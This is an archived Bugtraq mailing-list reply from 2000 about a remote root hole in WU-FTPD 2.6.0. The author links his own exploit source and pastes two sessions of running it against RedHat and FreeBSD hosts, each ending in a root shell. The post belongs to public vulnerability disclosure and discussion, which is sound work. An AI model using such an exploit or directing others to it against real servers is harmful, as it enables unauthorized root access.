Bugtraq mailing list archives

Re: WuFTPD: Providing remote root since at least1994

From: venglin () FREEBSD LUBLIN PL (Przemyslaw Frasunek)
Date: Sat, 1 Jul 2000 17:12:35 +0200

Has anyone come out with a working version of this exploit script. Both
versions provided on the securityfocus.com web site, and or the one

distributed

here by TF8 is not working, even after I fixed his code.  Do we know for sure
the thing even exists.. I dunno, can anyone direct me to the actual code,
because I have yet to see a working version of it that doesn't CORE dump.


sure? both, tf8's and mine (http://v.freebsd.lublin.pl/sources/bobek.c), works
on my redhat and bsd boxes:

lubi:venglin:~> ./b -t 4 pedagog
Selected platform: RedHat Linux 6.2 with WUFTPD 2.6.0-RPM

Connected to pedagog. Trying to log in.
Logged in as ftp. Checking vulnerability.
Ok, trying to find offset (initial: 1024)
at offset 1024
at offset 1032
at offset 1040
at offset 1048
at offset 1056
at offset 1064
at offset 1072
at offset 1080
at offset 1088
at offset 1096
RET: 0x80759e0, RET location: 0xbfffcf74, RET location offset on stack: 1100
Reply size: 289, New RET: 0x80758bf
Wait 10-20 seconds for reply. Enjoy your shell.
[...]
0000000000000000000000000000000
Linux pedagog.xxx.xxx.xx 2.2.14-5.0 #1 Tue Mar 7 21:07:39 EST 2000 i686 unknown
/
uid=0(root) gid=0(root) egid=50(ftp) groups=50(ftp)

another exaple:

lubi:venglin:~> ./b localhost
Selected platform: FreeBSD 3.4-STABLE with WUFTPD 2.6.0-ports

Connected to localhost. Trying to log in.
Logged in as ftp. Checking vulnerability.
Ok, trying to find offset (initial: 1024)
at offset 1024
at offset 1032
at offset 1040
at offset 1048
at offset 1056
at offset 1064
at offset 1072
RET: 0x80b1f10, RET location: 0xbfbfcc04, RET location offset on stack: 1076
Reply size: 527, New RET: 0x80b1d01
Wait 10-20 seconds for reply. Enjoy your shell.
[...]
00000000000000000000000000000000000000000000000000000000000000
FreeBSD lubi.xxx.xxx.xx 3.4-STABLE FreeBSD 3.4-STABLE #1: Wed Mar  1 11:18:54
CET 2000     venglin () lubi xxx xxx xx:/mnt/elite/usr/src/sys/compile/GADACZKA
i386
/
uid=0(root) gid=0(wheel) egid=5(operator) groups=5(operator)

--
* Fido: 2:480/124 ** WWW: http://www.freebsd.lublin.pl ** NIC-HDL: PMF9-RIPE *
* Inet: venglin () freebsd lublin pl ** PGP: D48684904685DF43  EA93AFA13BE170BF *

Current thread:

Re: remote crash BitchX 1.0c16, (continued)
- - - Re: remote crash BitchX 1.0c16 Moniz, Troy (Jul 05)
  - Oracle Web Listener for AIX DoS Peter Grundl (Jul 04)
  - Remote DoS Attack in LocalWEB HTTP Server 1.2.0 Vulnerability Ussr Labs (Jul 04)
  - Recovering Passwords in Visible Systems' Razor Clifford, Shawn A (Jul 05)
  - proftp advisory lamagra (Jul 05)
    - Re: proftp advisory Max Vision (Jul 05)
    - Re: proftp advisory Daniel Jacobowitz (Jul 05)
    - Secure IRC Fabio Pietrosanti (Jul 06)
- Re: WuFTPD: Providing *remote* root since at least1994 Sebastian (Jul 01)
- Re: WuFTPD: Providing *remote* root since at least1994 Lamagra Argamal (Jul 01)
- Re: WuFTPD: Providing *remote* root since at least1994 Przemyslaw Frasunek (Jul 01)
- Re: WuFTPD: Providing *remote* root since at least1994 Vitaliy Andrusevich (Jul 04)

Bugtraq mailing list archives

Re: WuFTPD: Providing *remote* root since at least1994

Current thread:

Re: WuFTPD: Providing remote root since at least1994